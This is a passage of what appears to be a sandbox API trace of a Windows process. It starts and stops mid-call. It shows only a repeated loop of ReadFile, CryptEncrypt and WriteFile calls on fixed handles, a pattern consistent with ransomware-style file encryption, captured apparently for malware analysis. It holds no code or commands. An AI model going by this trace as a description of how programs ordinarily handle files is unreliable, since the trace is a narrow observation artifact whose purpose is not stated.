lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.654] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.654] GetLastError () returned 0x0 [0144.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.654] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.655] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.655] GetLastError () returned 0x0 [0144.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.655] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.655] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.655] GetLastError () returned 0x0 [0144.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.655] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.655] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.655] GetLastError () returned 0x0 [0144.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.655] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.655] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.655] GetLastError () returned 0x0 [0144.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.655] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.655] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.655] GetLastError () returned 0x0 [0144.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.655] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.655] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.655] GetLastError () returned 0x0 [0144.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.655] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.656] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.656] GetLastError () returned 0x0 [0144.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.656] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.656] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.656] GetLastError () returned 0x0 [0144.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.656] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.656] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.656] GetLastError () returned 0x0 [0144.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.656] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.656] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.656] GetLastError () returned 0x0 [0144.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.656] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.656] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.656] GetLastError () returned 0x0 [0144.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.656] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.656] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.656] GetLastError () returned 0x0 [0144.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.656] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.656] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.656] GetLastError () returned 0x0 [0144.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.657] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.657] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.657] GetLastError () returned 0x0 [0144.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.657] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.657] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.657] GetLastError () returned 0x0 [0144.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.657] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.657] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.657] GetLastError () returned 0x0 [0144.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.657] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.657] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.657] GetLastError () returned 0x0 [0144.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.657] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.657] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.657] GetLastError () returned 0x0 [0144.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.657] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.657] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.657] GetLastError () returned 0x0 [0144.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.657] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.658] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.658] GetLastError () returned 0x0 [0144.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.658] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.658] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.658] GetLastError () returned 0x0 [0144.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.658] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.658] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.658] GetLastError () returned 0x0 [0144.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.658] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.658] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.658] GetLastError () returned 0x0 [0144.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.658] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.658] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.658] GetLastError () returned 0x0 [0144.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.658] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.658] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.658] GetLastError () returned 0x0 [0144.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.658] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.658] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.659] GetLastError () returned 0x0 [0144.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.659] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.659] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.659] GetLastError () returned 0x0 [0144.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.659] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.659] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.659] GetLastError () returned 0x0 [0144.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.659] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.659] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.659] GetLastError () returned 0x0 [0144.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.659] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.659] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.659] GetLastError () returned 0x0 [0144.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.659] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.659] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.659] GetLastError () returned 0x0 [0144.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.659] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.659] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, 